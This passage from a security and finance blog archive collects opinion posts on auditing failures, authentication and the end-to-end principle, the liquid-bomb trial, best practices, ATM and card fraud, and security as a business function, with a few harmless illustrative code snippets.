    • the process and the learning of audit work is surrounded by mystique and control in classical guild fashion,
    • the Auditor bills-per-hour,
    • the Auditor knows what the problems are,
    • and has integral consulting resources attached,
    • who can be introduced to solve the problems,
    • and bill-per-hour.

    As against all that complexity and all that secrecy, there is a single Auditor, delivering a single report. To you. A single, rather small report, as against a frequent and, in sum, huge series of bills.

    So in all this complexity, although Auditors might suggest that they reduce the complexity by compressing it all into one single "opinion", the complexity actually works to the ultimate benefit of the Auditor. Not to your benefit. It is to the Auditor's advantage to increase the complexity, and because it is all secret and you don't understand it anyway, any negative effect on you is not observable. Given our second claim, this is indeed what they do.

    Say hello to SOX, a doubling of the complexity, and a doubling of your auditor's invoice.

    Say thank you, Congressmen Sarbanes and Oxley, and we hope your pension survives!

    Claim Number 4: The Auditor has become the insider. Although he is the one you perceive to be an outsider, protecting your interests, in reality, the Auditor is only a nominal, pretend outsider. He is in reality a stakeholder who was given the keys to become an insider a long time ago. Is there any surprise that, with the passage of time, the profession has moved to secure its role? As stakeholder? As insider? To secure the benefit to itself?

    Over time, the noble profession of Auditing has moved against your interests. Once, it was a mighty independent observer, a white knight riding forth to save your honour, your interest, your very patrimony. Audits were penetrating and meticulous!

    Now, the auditor is just another incumbent stakeholder, another mercenary for hire. Test this: did any audit firm fight the rise of Sarbanes-Oxley as being unnecessary, overly costly and not delivering value for money to clients? Does any audit firm promote a product that halves the price? Halves the complexity? Has any audit firm investigated the relationship between the failed banks and the failed audits over those banks? Did any audit firm suggest that reserves weren't up to a downturn? Has any audit firm complained that mark-to-market depends on a market? Did any auditor insist on stress testing? Has ... oh never mind.

    I'm honestly interested in this question. If you know the answer: post it in comments! With luck, we can change the flow of this entire research, which awaits ... the NEXT post.

    Posted by iang at 03:42 PM | Comments (3) | TrackBack

    September 11, 2009

    40 years on, packets still echo on, and we're still dropping the auth-shuns

    It's terrifically cliched to say it these days, but the net is one of the great engineering marvels of science. The Economist reports it as 40 years old:

    Such contentious issues never dawned on the dozen or so engineers who gathered in the laboratory of Leonard Kleinrock (pictured below) at the University of California, Los Angeles (UCLA) on September 2nd, 1969, to watch two computers transmit data from one to the other through a 15-foot cable. The success heralded the start of ARPANET, a telecommunications network designed to link researchers around America who were working on projects for the Pentagon. ARPANET, conceived and paid for by the defence department’s Advanced Research Projects Agency (nowadays called DARPA), was unquestionably the most important of the pioneering “packet-switched” networks that were to give birth eventually to the internet.

    Right, ARPA funded a network, and out of that emerged the net we know today. Bottom-up, not top-down like the European competitor, OSI/ISO. Still, it wasn't about doing everything from the bottom:

    The missing link was supplied by Robert Kahn of DARPA and Vinton Cerf at Stanford University in Palo Alto, California. Their solution for getting networks that used different ways of transmitting data to work together was simply to remove the software built into the network for checking whether packets had actually been transmitted—and give that responsibility to software running on the sending and receiving computers instead. With this approach to “internetworking” (hence the term “internet”), networks of one sort or another all became simply pieces of wire for carrying data. To packets of data squirted into them, the various networks all looked and behaved the same.

    I hadn't realised that this lesson is so old, but that makes sense. It is a lesson that will echo through time, doomed to be re-learnt over and over again, because it is so uncomfortable: The application is responsible for getting the message across, not the infrastructure. To the extent that you make any lower layer responsible for your packets, you reduce reliability.
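
    The lesson fits in a few lines of code. Here is a toy sketch of my own (nothing to do with ARPANET's actual implementation): the lower layer is allowed to be lossy, and it is the application that keeps retransmitting until it has seen its own acknowledgement.

        # End-to-end responsibility in miniature: the application retries until
        # *it* observes success, rather than trusting the layer below.
        import random

        def lossy_send(packet, loss_rate=0.5):
            """Stand-in for an unreliable lower layer: sometimes the packet vanishes."""
            return random.random() > loss_rate      # True means the peer acknowledged it

        def reliable_send(packet, max_tries=20):
            """Application-level delivery: keep going until acknowledged."""
            for attempt in range(1, max_tries + 1):
                if lossy_send(packet):
                    return attempt
            raise RuntimeError("the application, not the wire, reports the failure")

        print("delivered after", reliable_send(b"hello"), "attempt(s)")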

    This subtlety -- knowing what you could push down into the lower layers, and what you cannot -- is probably one of those things that separates the real engineers from the journeymen. The wolves from the sheep, the financial cryptographers from the Personal-Home-Pagers. If you thought TCP was reliable, you may count yourself amongst the latter, the sheepish millions who believed in that myth, and partly got us to the security mess we are in today. (Related, it seems, is that cloud computing has the same issue.)

    Curiously, though, from the rosy eyed view of today, it is still possible to make the same layer mistake. Gunnar reported on the very same Vint Cerf saying today (more or less):

    Internet Design Opportunities for Improvement

    There's a big Gov 2.0 summit going on, which I am not at, but in the event apparently John Markoff asked Vint Cerf the following question: "what would you have designed differently in building the Internet?" Cerf had one answer: "more authentication"

    I don't think so. Authentication, or authorisation or any of those other shuns is again something that belongs in the application. We find it sits best at the very highest layer, because it is a claim of significant responsibility. At the intermediate layers you'll find lots of wannabe packages vying for your corporate bux:

    * IP * IP Password * Kerberos * Mobile One Factor Unregistered * Mobile Two Factor Registered * Mobile One Factor Contract * Mobile Two Factor Contract * Password * Password Protected transport * Previous Session * Public Key X.509 * Public Key PGP * Public Key SPKI * Public Key XML Digital Signature * Smartcard * Smartcard PKI * Software PKI * Telephony * Telephony Nomadic * Telephony Personalized * Telephony Authenticated * Secure remote password * SSL/TLS Client Authentication * Time Sync Token * Unspecified

    and that's just in SAML! "Holy protocol hodge-podge Batman!" says Gunnar, and he's not often wrong.

    Indeed, as Adam pointed out, the net works in part because it deliberately shunned the auth:

    The packet interconnect paper ("A Protocol for Packet Network Intercommunication," Vint Cerf and Robert Kahn) was published in 1974, and says "These associations need not involve the transmission of data prior to their formation and indeed two associates need not be able to determine that they are associates until they attempt to communicate."

    So what was Vint Cerf getting at? He clarified in comments to Adam:

    The point is that the current design does not have a standard way to authenticate the origin of email, the host you are talking to, the correctness of DNS responses, etc. Does this autonomous system have the authority to announce these addresses for routing purposes? Having standard tools and mechanisms for validating identity or authenticity in various contexts would have been helpful.

    Right. The reason we don't have standard ways to do this is because it is too hard a problem. There is no answer to what it means:

    people like me could and did give internet accounts to (1) anyone our boss said to and (2) anyone else who wanted them some of this internet stuff and wouldn't get us in too much trouble. (Hi S! Hi C!)

    which therefore means, it is precisely and only whatever the application wants. Or, if your stack design goes up fully past layer 7 into the people layer, like CAcert.org, then it is what your boss wants. So, Skype has it, my digital cash has it, Lynn's X959 has it, and PGP has it. IPSec hasn't got it, SSL hasn't got it, and it looks like SAML won't be having it, in truck-loads :) Shame about that!

    Digital signature technology can help here but just wasn't available at the time the TCP/IP protocol suite was being standardized in 1978.

    (As Gunnar said: "Vint Cerf should let himself off the hook that he didn't solve this in 1978.") Yes, and digital signature technology is another reason why modern clients can be designed with it, built in and aligned to the application. But not "in the Internet" please! As soon as the auth stuff is standardised or turned into a building block, it has a terrible habit of turning into treacle. Messy brown sticky stuff that gets into everything, slows everyone down and gives young people an awful insecurity complex derived from pimples.
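
    Here is a minimal sketch of what "built in and aligned to the application" can look like, assuming the Python `cryptography` package; the keys, names and message format are all illustrative, not anyone's actual protocol. The application itself signs the business-level message it takes responsibility for, and the receiving application verifies before it acts, so the claim travels with the message rather than being delegated to a layer below.

        # Application-level authorisation, sketched: the sender's application signs
        # the message it is responsible for; the receiver verifies before acting.
        from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
        from cryptography.exceptions import InvalidSignature

        signing_key = Ed25519PrivateKey.generate()   # held by the authorising application
        verify_key = signing_key.public_key()        # published to its counterparties

        message = b'{"pay": "100.00", "to": "alice", "ref": "invoice-42"}'
        signature = signing_key.sign(message)        # the application's own claim over its own message

        try:
            verify_key.verify(signature, message)    # the receiving application checks before it acts
            print("authorised: proceed")
        except InvalidSignature:
            print("reject: no authorisation, no processing")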

    Oops, late addition of counter-evidence: "US Government to let citizens log in with OpenID and InfoCard?" You be the judge!

    Posted by iang at 12:57 PM | Comments (2) | TrackBack

    September 10, 2009

    Hide & seek in the terrorist battle

    Court cases often give us glimpses of security issues. A court in Britain has just convicted three from the liquid explosives gang, and now that it is over, there are press reports of the evidence. It looks now like the intelligence services achieved one of two possible victories by stopping the plot. Wired reports that NSA intercepts of emails have been entered in as evidence.

    According to Channel 4, the NSA had previously shown the e-mails to their British counterparts, but refused to let prosecutors use the evidence in the first trial, because the agency didn’t want to tip off an alleged accomplice in Pakistan named Rashid Rauf that his e-mail was being monitored. U.S. intelligence agents said Rauf was al Qaeda’s director of European operations at the time and that the bomb plot was being directed by Rauf and others in Pakistan.

    The NSA later changed its mind and allowed the evidence to be introduced in the second trial, which was crucial to getting the jury conviction. Channel 4 suggests the NSA’s change of mind occurred after Rauf, a Briton born of Pakistani parents, was reportedly killed last year by a U.S. drone missile that struck a house where he was staying in northern Pakistan.

    Although British prosecutors were eager to use the e-mails in their second trial against the three plotters, British courts prohibit the use of evidence obtained through interception. So last January, a U.S. court issued warrants directly to Yahoo to hand over the same correspondence.

    So there are some barriers between intercept and use in trial. The reason they came from the NSA is probably that old trick of avoiding prohibitions on domestic surveillance: if the trial had been in the USA, GCHQ might have provided the intercepts.

    What was more interesting, however, was the content of the alleged messages. This BBC article includes 7 of them; here's one:

    4 July 2006: Abdulla Ahmed Ali to Pakistan

    Listen dude, when is your mate gonna bring the projectors and the taxis to me? I got all my bits and bobs. Tell your mate to make sure the projectors and taxis are fully ready and proper I don't want my presentation messing up.

    WHAT PROSECUTORS SAID IT MEANT: Prosecutors said that projectors and taxis were code for knowledge and equipment, because Ahmed Ali still needed some guidance. The word "presentation" could mean attack.

    The others also have interesting use of code words, such as Calvin Klein aftershave for hydrogen peroxide (hair bleach). The use of such codes (as opposed to ciphers) is not new; historically they were well known. Code words tend not to be used now because ciphers cover more of the problem space, and once you know something of the activity, the listener can guess at the meanings.

    In theory, at least; code words clearly didn't work to protect the liquid bombers. Worse for them, it probably made their conviction easier, because Muslims discussing the purchase of 4 litres of aftershave with other Muslims in Pakistan seems very odd.

    One remaining question was whether the plot would actually work. We all know that the airlines banned liquids because of this event. Many amateurs have opined that it is simply too hard to do liquid explosives. However, the BBC employed an expert to try it, and using what amounts to between half a litre and a litre of finished product, they got this result:

    Certainly a dramatic explosion, enough to kill people within a few metres, and enough to blow a 2m hole in the fuselage. (The BBC video is only a minute long, well worth watching.)

    Would this have brought down the aircraft? Not necessarily, as there are many examples of aircraft with such damage that have survived. Perhaps if the bomb was in a strategic spot (over the wing? or near the fuel lines?) or the aircraft was stuck over the Atlantic with no easy vector. Either way, a bad day to fly, and as the explosives guy said, pity the passengers who didn't have their seat belts on.

    Score one for the intel agencies. But the terrorists still achieved their second victory out of two: passengers are still terrorised in their millions when they forget to dispose of their innocent drinking water. What is somewhat of a surprise is that the terrorists have not as yet seized on the disruptive path that is clearly available, a la John Robb. I read somewhere that it only takes a 7% "security tax" on a city to destroy it over time, and we already know that the airport security tax has to be in that ballpark.

    "It's the End of the CISO As We Know It (And I Feel Fine)"...

    ...First, they miss the opportunity to look at security as a business enabler. Dr. Garigue pointed out that because cars have brakes, we can drive faster. Security as a business enabler should absolutely be the starting point for enterprise information security programs.
    ...

    Secondly, if your security model reflects some CYA abstraction of reality instead of reality itself your security model is flawed. I explored this endemic myopia...

    This rhymes with: "what's your business model?" The bit lacking from most orientations is the enabler, why are we here in the first place? It's not to show the most elegant protocol for achieving C-I-A (confidentiality, integrity, authenticity), but to promote the business.

    How do we do that? Well, most technologists don't understand the business, let alone can speak the language. And, the business folks can't speak the techno-crypto blah blah either, so the blame is fairly shared. Dr. Garigue points us to Charlemagne as a better model:

    King of the Franks and Holy Roman Emperor; conqueror of the Lombards and Saxons (742-814) - reunited much of Europe after the Dark Ages.

    He set up other schools, opening them to peasant boys as well as nobles. Charlemagne never stopped studying. He brought an English monk, Alcuin, and other scholars to his court - encouraging the development of a standard script.

    He set up money standards to encourage commerce, tried to build a Rhine-Danube canal, and urged better farming methods. He especially worked to spread education and Christianity in every class of people.

    He relied on Counts, Margraves and Missi Domini to help him.

    Margraves - Guard the frontier districts of the empire. Margraves retained, within their own jurisdictions, the authority of dukes in the feudal arm of the empire.

    Missi Domini - Messengers of the King.

    In other words, the role of the security person is to enable others to learn, not to do, nor to critique, nor to design. In more specific terms, the goal is to bring the team to a better standard, and a better mix of security and business. Garigue's mandate for IT security?

    Knowledge of risky things is of strategic value

    How to know today tomorrow’s unknown ?

    How to structure information security processes in an organization so as to identify and address the NEXT categories of risks ?

    Curious, isn't it! But if we think about how reactive most security thinking is these days, one has to wonder where we would ever get the chance to fight tomorrow's war, today?

    July 12, 2009

    Audits IV - How many rotten apples will spoil the barrel?

    In the previous posts on Audits (1, 2, 3) I established that you yourself cannot determine from the outside whether an audit is any good. So how do we deal with this problem?

    We can take a statistical approach to the investigation. We can probably agree that some audits are not strong (the financial crisis thesis), and some are definitely part of the problem (Enron, Madoff, Satyam, Stanford), not the solution. This rules out all audits being good.

    The easy question: are all audits in the bad category, and we just don't know it, or are some good and some bad? We can rule out all audits being bad, because Refco was caught by a good audit, eventually.

    So we are somewhere in-between the extremes. Some good, some bad. The question then further develops into whether the ones that are good are sufficiently valuable to overcome the ones that are bad. That is, one totally fraudulent result can be absorbed in a million good results. Or, if something is audited, even badly or with a percentage chance of bad results, some things should be improved, right?

    Statistically, we should still get a greater benefit.

    The problem with this view is that we the outside world can't tell which is which, yet the point of the audit is to tell us: which is which. Because of the intent of the audit -- entering into the secrets of the corporate and delivering a judgment over the secrets -- there are no tools for us to distinguish. This is almost deliberate, almost by definition! The point of the audit is for us to distinguish the secretively good from the secretively bad; if we also have to distinguish amongst the audits, we have a problem.

    Which is to say, auditing is highly susceptible to the rotten apples problem: a few rotten apples in a barrel quickly makes the whole barrel worthless.

    How many is a few? One failed audit is not enough. But 10 might be, or 100, or 1% or 10%, it all depends. So we need to know some sort of threshold, past which, the barrel is worthless. Once we determine that some percentage of audits above the threshold are bad, all of them are dead, because confidence in the system fails and all audits become ignored by those that might have business in relying on them.
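
    To see the shape of that threshold, here is a toy model with purely made-up numbers of my own; nothing here is empirical. The only point it makes is that because one bad audit can cost far more than a good audit is worth, the expected value of relying on audits goes negative at a surprisingly small fraction of rotten apples.

        # Toy model: expected value to an outsider of relying on an arbitrary audit.
        def value_of_relying(bad_fraction, benefit_per_good=1.0, loss_per_bad=50.0):
            return (1 - bad_fraction) * benefit_per_good - bad_fraction * loss_per_bad

        for bad in (0.0, 0.01, 0.02, 0.05, 0.10):
            v = value_of_relying(bad)
            verdict = "worth relying on" if v > 0 else "barrel is rotten"
            print(f"{bad:>5.0%} bad audits -> expected value {v:+.2f}  ({verdict})")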

    The empirical question of what that percentage would be is obviously a subject of some serious research, but I believe we can skip it by this simple check. Compare the threshold to our by now painfully famous financial crisis test. So far, in the financial crisis, all the audits failed to pick up the problem (and please, by all means post in comments any exceptions! Anonymously is fine!).

    Whatever the watermark for general failure is, if the financial crisis is any guide, we've probably reached it. We are, I would claim, in the presence of material evidence that the Audit has passed the threshold for public reliance. The barrel is rotten.

    But, how did we reach this terrible state of affairs? How could this happen? Let's leave that speculation for another post.

    (Afterword: Since the last post on Audit, I resigned my role as Auditor over at CAcert. This moves me from slightly inside the profession to mostly outside. Does this change these views written here? So far, no, but you can be the judge.)

    Posted by iang at 05:21 PM | Comments (3) | TrackBack

    April 03, 2009

    The Exquisite Torture of Best Practices

    Best practices has always seemed to be a flaky idea, and it took me a long time to unravel why, at least in my view. It is that, if you adopt best practices, you are accepting, and proving, that you yourself are not competent in this area. In effect, you have no better strategy than to adopt whatever other people say.

    The "competences" theory would have it that you adopt best practices in security if you are an online gardening shop, because your competences lie in the field of delivering gardening tools, plants and green thumbs advice. Not in security, and gosh, if someone steals a thousand plants then perhaps we should also throw in the shovel and some carbon credits to ease them into a productive life...

    On the other hand, if you are dealing with, say, money, best practices in security is not good enough. You have entered a security field, through no fault of your own but because crooks really do always want to steal it. So your ability in defending against that must be elevated, above and beyond the level of "best practices," above and beyond the ordinary.

    In the language of core competences, you must develop a competence in security. Now, Adam comes along and offers an alternate perspective:

    Best practices are ideas which make intuitive sense: don't write down your passwords. Make backups. Educate your users. Shoot the guy in the kneecap and he'll tell you what you need to know.

    I guess it is true that best practices do make some form of intuitive sense, as otherwise they are too hard to propagate. More importantly:

    The trouble is that none of these are subjected to testing. No one bothers to design experiments to see if users who write down their passwords get broken into more than those who don't. No one tests to see if user education works. (I did, once, and stopped advocating user education. Unfortunately, the tests were done under NDA.)

    The other trouble is that once people get the idea that some idea is a best practice, they stop thinking about it critically. It might be because of the authority instinct that Milgram showed, or because they've invested effort and prestige in their solution, or because they believe the idea should work.

    What Adam suggests is that best practices survive far longer than is useful, because they have no feedback loop. Best practices are not tested, so they are a belief, not a practice. Once a belief takes hold, we are into a downward spiral (as described in the Silver Bullets paper, which itself simply applies the full _asymmetric literature_ to security) which at its core is due to the lack of a confirming test in the system that nudges the belief to keep pace with the times; if there is nothing that nudges the idea towards relevancy, it meanders by itself away from relevancy and eventually to wrongness.

    But it is still a belief, so we still do it and smile wisely when others repeat it. For example, best practices has it that you don't write your passwords down. But, in the security field, we all agree now that this is wrong. "Best" is now bad; you are strongly encouraged to write your passwords down. Why do we call the bad idea "best practices"? Because there is nothing in the system of best practices that changes it to cope with the way we work today.

    The next time someone suggests something because it's a best practice, ask yourself: is this going to work? Will it be worth the cost?

    I would say -- using my reading of asymmetric goods and with a nod to the systems theory of feedback loops, as espoused by Boyd -- that the next time someone suggests that you use it because it is a best practice, you should ask yourself:

    Do I need to be competent in this field?

    If you sell seeds and shovels, don't be competent in online security. Outsource that, and instead think about soil acidity, worms, viruses and other natural phenomena. If you are in online banking, be competent in security. Don't outsource that, and don't lower yourself to the level of best practices.

    Understand the practices, and test them. Modify them and be ready to junk them. Don't rest on belief, and dismiss others' attempts to have you conform to a belief they themselves hold, but cannot explain.

    (Then, because you are competent in the field, your very next question is easy. What exactly was the genesis of the "don't write passwords down" belief? Back in the dim dark mainframe days, we had one account and the threat was someone reading the post-it note on the side of the monitor. Now, we each have hundreds of accounts and passwords, and the desire to avoid dictionary attacks forces each password to be unmemorable. For those with the competence, again to use the language of core competences, the rest follows. "Write your passwords down, dear user.")

    Posted by iang at 05:19 AM | Comments (2) | TrackBack

    April 02, 2009

    Are the "brightest minds in finance" finally onto something?

    [Lynn writes somewhere else, copied without shame:]

    A repeated theme in the Madoff hearing (by the person trying for a decade to get SEC to do something about Madoff) was that while new legislation and regulation was required, it was much more important to have transparency and visibility; crooks are inventive and will always be ahead of regulation.

    however ... from The Quiet Coup:

    But there's a deeper and more disturbing similarity: elite business interests -- financiers, in the case of the U.S. -- played a central role in creating the crisis, making ever-larger gambles, with the implicit backing of the government, until the inevitable collapse. More alarming, they are now using their influence to prevent precisely the sorts of reforms that are needed, and fast, to pull the economy out of its nosedive. The government seems helpless, or unwilling, to act against them.

    From The DNA of Corruption:

    While the scale of venality of Wall Street dwarfs that of the Pentagon's, I submit that many of the central qualities shaping America's Defense Meltdown (an important new book with this title, also written by insiders, can be found here) can be found in Simon Johnson's exegesis of America's even more profound Financial Meltdown.

    ... and related to above, Mark-to-Market Lobby Buoys Bank Profits 20% as FASB May Say Yes:

    Officials at Norwalk, Connecticut-based FASB were under "tremendous pressure" and "more or less eviscerated mark-to-market accounting," said Robert Willens, a former managing director at Lehman Brothers Holdings Inc. who runs his own tax and accounting advisory firm in New York. "I'd say there was a pretty close cause and effect."

    From Now-needy FDIC collected little in premiums:

    The federal agency that insures bank deposits, which is asking for emergency powers to borrow up to $500 billion to take over failed banks, is facing a potential major shortfall in part because it collected no insurance premiums from most banks from 1996 to 2006.

    with respect to taxes, there was roundtable of "leading expert" economists last summer about current economic mess. their solution was "flat rate" tax. the justification was:

    1. eliminates possibly majority of current graft & corruption in washington that is related to current tax code structure, lobbying and special interests
    2. picks up 3-5% productivity in GNP. current 65,000 page taxcode is reduced to 600 pages ... that frees up huge amount of people-hrs in lost productivity involved in dealing directly with the taxcode as well as lost productivity because of non-optimal business decisions.

    their bottom line was that it probably would only be temporary before the special interests reestablish the current pervasive atmosphere of graft & corruption.

    a semi-humorous comment was that a special interest that has lobbied against such a change has been Ireland ... supposedly because some number of US operations have been motivated to move to Ireland because of their much simpler business environment.

    with respect to feedback processes ... I (Lynn) had done a lot with dynamic adaptive (feedback) control algorithms as an undergraduate in the 60s ... which was used in some products shipped in the 70s & 80s. In the early 80s, I had a chance to meet John Boyd and sponsor his briefings. I found quite a bit of affinity to John's OODA-loop concept (observe, orient, decide, act) that is now starting to be taught in some MBA programs.

    Posted by iang at 06:51 PM | Comments (3) | TrackBack

    February 13, 2009

    this one's significant: 49 cities in 30 minutes!

    No, not this stupidity: "The Breach of All Breaches?" but this one, spotted by JP (and also see Fraud, Phishing and Financial Misdeeds, scary, flashmob, and fbi wanted poster seen to right):

    * Reported by John Deutzman

    Photos from security video obtained by Fox 5 show a small piece of a huge scam that took place all in one day, in a matter of hours. According to the FBI, ATMs in 49 cities were hit -- including Atlanta, Chicago, New York, Montreal, Moscow and Hong Kong.

    "We've seen similar attempts to defraud a bank through ATM machines but not, not anywhere near the scale we have here," FBI Agent Ross Rice told Fox 5.
    ....

    "Over 130 different ATM machines in 49 cities worldwide were accessed in a 30-minute period on November 8," Agents Rice said. "So you can get an idea of the number of people involved in this and the scope of the operation."

    Here is the amazing part: With these cashers ready to do their dirty work around the world, the hacker somehow had the ability to lift those limits we all have on our ATM cards. For example, I'm only allowed to take out $500 a day, but the cashers were able to cash once, twice, three times over and over again. When it was all over, they only used 100 cards but they ripped off $9 million.

    This lifts the level of capability of the attacker several notches up. This is a huge coordinated effort. Are we awake now to the problems that we created for ourselves a decade ago?
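
    The arithmetic from the figures quoted above shows just how far up the notches go. A back-of-the-envelope check:

        # Figures from the report above: 100 cards, ~130 ATMs, 49 cities, $9 million,
        # against a typical $500/day withdrawal limit.
        cards, atms, stolen, normal_daily_limit = 100, 130, 9_000_000, 500

        print("max haul with limits intact:", cards * normal_daily_limit)   # $50,000
        print("actual haul per card:", stolen // cards)                     # $90,000
        print("average haul per ATM:", stolen // atms)                      # ~$69,000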

    (Apologies, no time to do the real research and commentary today! Thanks, JP!)

    Posted by iang at 08:25 AM | Comments (0) | TrackBack

    January 30, 2009

    Brit Frauds, the Bezzle, and Signs of Rebellion in Heartland

    Payments fraud seems up in Britain:

    Matters found that around 26% fell victim to card fraudsters in 2008, up five per cent on the previous year.

    Kerry D'Souza, card fraud expert, CPP, says: "The dramatic increase in card fraud shows no sign of abating which isn't surprising given the desperate measures some people will resort to during the recession."

    The average sum fraudulently transacted is over £650, with one in 20 victims reporting losses of over £2000. Yet 42% of victims did not know about these transactions and only found out they had been defrauded when alerted by their bank.

    Online fraud affected 39% of victims, while card cloning from a cash point or chip and pin device accounted for a fifth of cases. Out of all cards that are physically lost and stolen, one in ten are also being used fraudulently.

    One in 4 sounds quite high. That's a lot higher than one would expect. So either fraud has been running high and only now are better figures available, or it is growing? They say it is growing.

    While researching origins of failure I came across this interesting snippet the other day from Richard Veryard:

    The economist J.K. Galbraith used the term "bezzle" to denote the amount of money siphoned (or "embezzled") from the system. In good times, he remarked, the bezzle rises sharply, because everyone feels good and nobody notices. "In [economic] depression, all this is reversed. Money is watched with a narrow, suspicious eye. The man who handles it is assumed to be dishonest until he proves himself otherwise. Audits are penetrating and meticulous. Commercial morality is enormously improved. The bezzle shrinks." [Galbraith, The Great Crash 1929]

    If this is true, then likely people will be waking up and demanding more from the payments infrastructure. No more easy money for them. Signs of this were spotted by Lynn:

    "Up to this point, there has been no information sharing, thus empowering cyber criminals to use the same or slightly modified techniques over and over again. I believe that had we known the details about previous intrusions, we might have found and prevented the problem we learned of last week."

    Heartland's goal is to turn this event into something positive for the public, the financial institutions which issue credit/debit cards and payments processors.

    Carr concluded, "Just as the Tylenol(R) crisis engendered a whole new packaging standard, our aspiration is to use this recent breach incident to help the payments industry find ways to protect its data - and therefore businesses and consumers - much more effectively."

    For the past year, Carr has been a strong advocate for industry adoption of end-to-end encryption - which protects data at rest as well as data in motion - as an improved and safer standard of payments security. While he believes this technology does not wholly exist on any payments platform today, Heartland has been working to develop this solution and is more committed than ever to deploying it as quickly as possible.
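
    A minimal sketch of the end-to-end idea Carr is describing, assuming the Python `cryptography` package and a deliberately simplified key arrangement (a single shared key provisioned into the capture device and the processor; a real design would use per-device keys or public-key wrapping): the card data is encrypted at the point of capture and stays encrypted, at rest and in motion, through every intermediate system.

        # End-to-end encryption of a card record, sketched with a shared key.
        from cryptography.fernet import Fernet

        processor_key = Fernet.generate_key()    # known to the terminal and the processor only
        terminal = Fernet(processor_key)
        processor = Fernet(processor_key)

        # At the point of capture: encrypt before anything stores or forwards the record.
        card_record = b"4111111111111111|12/27|123"
        ciphertext = terminal.encrypt(card_record)

        # Merchant hosts, logs and databases in between only ever hold `ciphertext`.
        assert card_record not in ciphertext

        # Only the processor recovers the plaintext, to authorise the payment.
        print(processor.decrypt(ciphertext))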

    Now, if you've read Lynn's rants on naked transactions, you will know exactly what this person is asking for. And you might even have a fair stab at why the payment providers denied Heartland that protection.

    Posted by iang at 05:48 AM | Comments (0) | TrackBack

    January 26, 2009

    WoW crosses GP: get rich quick in World of Warcraft

    SecretSquirrel writes:

    it's a "get rich quick" guide for sale ... but actually for the virtual money inside the WoW game

    Around a year or two ago I penned a series of rants called "GP" which predicted that the primary success signal of a new money was ... crime! The short summary is that in the battle for mindspace between issuers, users, critics & regulators, the press (who?) the offended and the otherwise religious ... there is no way for the external observer to figure out whether this is worthwhile or not.

    But wait, there is one way: if a criminal is willing to put his time, his investment, indeed his very freedom on the line for something, it's got to be worth something! GP is undeniably crossed, I theorise, when criminals steal the value, and therefore provide a most valuable signal to the world that this stuff is worth something.

    (it's not a parody!)

    it's exactly following the format to the line, of any of the famous get-rich-quick newsletters.

    (eg, http://www.landingpagecashmachine.com or hundreds of others) ... even the famous "three-line centered upper-lower case headline"

    Call me cynical, but I have seen hundreds of digital cash systems live and die without meriting a second thought. There have been thousands I haven't seen! In my decade++ of time in this field, I've only seen one external signal that is reliable. Even this:

    You know they say WoW is over $150 million per month in player fees now!

    Is ... well, ya know, could be a fake. Did we see that Satyam, a huge audited IT outsourcing firm in India, added some 13,000 jobs ... and nobody noticed?

    If I am right, I'll also be blamed for the upsurge in fake crimes :)

    Posted by iang at 11:49 PM | Comments (1) | TrackBack

    January 21, 2009

    Royal Bank of Scotland Falls 66% in One Day!

    Hasan points to this:

    Remember just over one year ago? RBS (Royal Bank of Scotland) paid $100bn for ABN Amro.

    For this amount it could now buy:

    • Citibank $22.5bn
    • Morgan Stanley $10.5bn
    • Goldman Sachs $21bn
    • Merrill Lynch $12.3bn
    • Deutsche Bank $13bn
    • Barclays $12.7bn

    And still have $8bn in change with which you would be able to pick up:

    GM, Ford, Chrysler and the Honda Formula 1 Racing-Team.

    Posted by iang at 09:14 AM | Comments (3) | TrackBack

    January 16, 2009

    What's missing in security: business

    Those of us who are impacted by the world of security suffer under a sort of love-hate relationship with the word; so much of it is how we build applications, but so much of what is labelled security out there in the rest of the world is utter garbage.

    So we tend to spend a lot of our time reverse-engineering popular security thought and finding the security bugs in it. I think I've found another one. Consider this very concise and clear description from Frank Stajano, who has published a draft book section seeking comments:

    The viewpoint we shall adopt here, which I believe is the only one leading to robust system security engineering, is that security is essentially risk management. In the context of an adversarial situation, and from the viewpoint of the defender, we identify assets (things you want to protect, e.g. the collection of magazines under your bed), threats (bad things that might happen, e.g. someone stealing those magazines), vulnerabilities (weaknesses that might facilitate the occurrence of a threat, e.g. the fact that you rarely close the bedroom window when you go out), attacks (ways a threat can be made to happen, e.g. coming in through the open window and stealing the magazines—as well as, for good measure, that nice new four-wheel suitcase of yours to carry them away with) and risks (the expected loss caused by each attack, corresponding to the value of the asset involved times the probability that the attack will occur). Then we identify suitable safeguards (a priori defences, e.g. welding steel bars across the window to prevent break-ins) and countermeasures (a posteriori defences, e.g. welding steel bars to the window after a break-in has actually occurred, or calling the police). Finally, we implement the defences that are still worth implementing after evaluating their effectiveness and comparing their (certain) cost with the (uncertain) risk they mitigate.

    (my emphases.) That's a good description of how the classical security world sees it. We start by saying, "What's your threat model?" Then out of that we build a security model to deal with those threats. The security model then incorporates some knowledge of risks to manage the tradeoffs.
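
    To reduce that calculus to a toy (a minimal sketch in Python, with every number invented purely for illustration): risk is the asset value multiplied by the probability of the attack, and a defence earns its keep when its certain cost is smaller than the uncertain risk it removes.

        # Toy version of the risk calculus in the quote above; all figures invented.
        asset_value = 500.0      # the magazine collection under the bed
        p_attack = 0.10          # chance of the window break-in this year
        risk = asset_value * p_attack              # expected loss: 50.0

        bars_cost = 30.0         # welding steel bars across the window
        risk_with_bars = asset_value * 0.01        # the attack is now much less likely

        worth_it = bars_cost < (risk - risk_with_bars)
        print(f"expected loss {risk:.2f}, after bars {risk_with_bars:.2f}, install: {worth_it}")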

    The bit that's missing is the business. Instead of asking "What's your threat model?" as the first question, it should be "What's your business model?" Security asks that last, and only partly, by asking questions like "what are the risks?"

    Calling security "risk management" then is a sort of nod to the point that security has a purpose within business; and by focussing on some risks, this allows the security modellers to preserve their existing model while tying it to the business. But it is still backwards; it is still seeking to add risks at the end, and will still result in "security" being just the annoying monkey on the back.

    Instead, the first question should be "What's your business model?"

    This unfortunately opens Pandora's box, because that implies that we can understand a business model. Assuming it is the case that your CISO understands a business model, it does rather imply that the only security we should be pushing is that which is from within. From inside the business, that is. The job of the security people is not therefore to teach and build security models, but to improve the abilities of the business people to incorporate good security as they are doing their business.

    Which perhaps brings us full circle to the popular claim that the best security is that which is built in from the beginning.

    Posted by iang at 03:51 AM | Comments (4) | TrackBack

    December 07, 2008

    Unwinding secrecy -- how to do it?

    The next question on unwinding secrecy is how to actually do it. It isn't as trivial as it sounds. Perhaps this is because the concept of "need-to-know" is so well embedded in the systems and managerial DNA that it takes a long time to root it out.

    At LISA I was asked how to do this; but I don't have much of an answer. Here's what I have observed:

    • Do a little at a time.
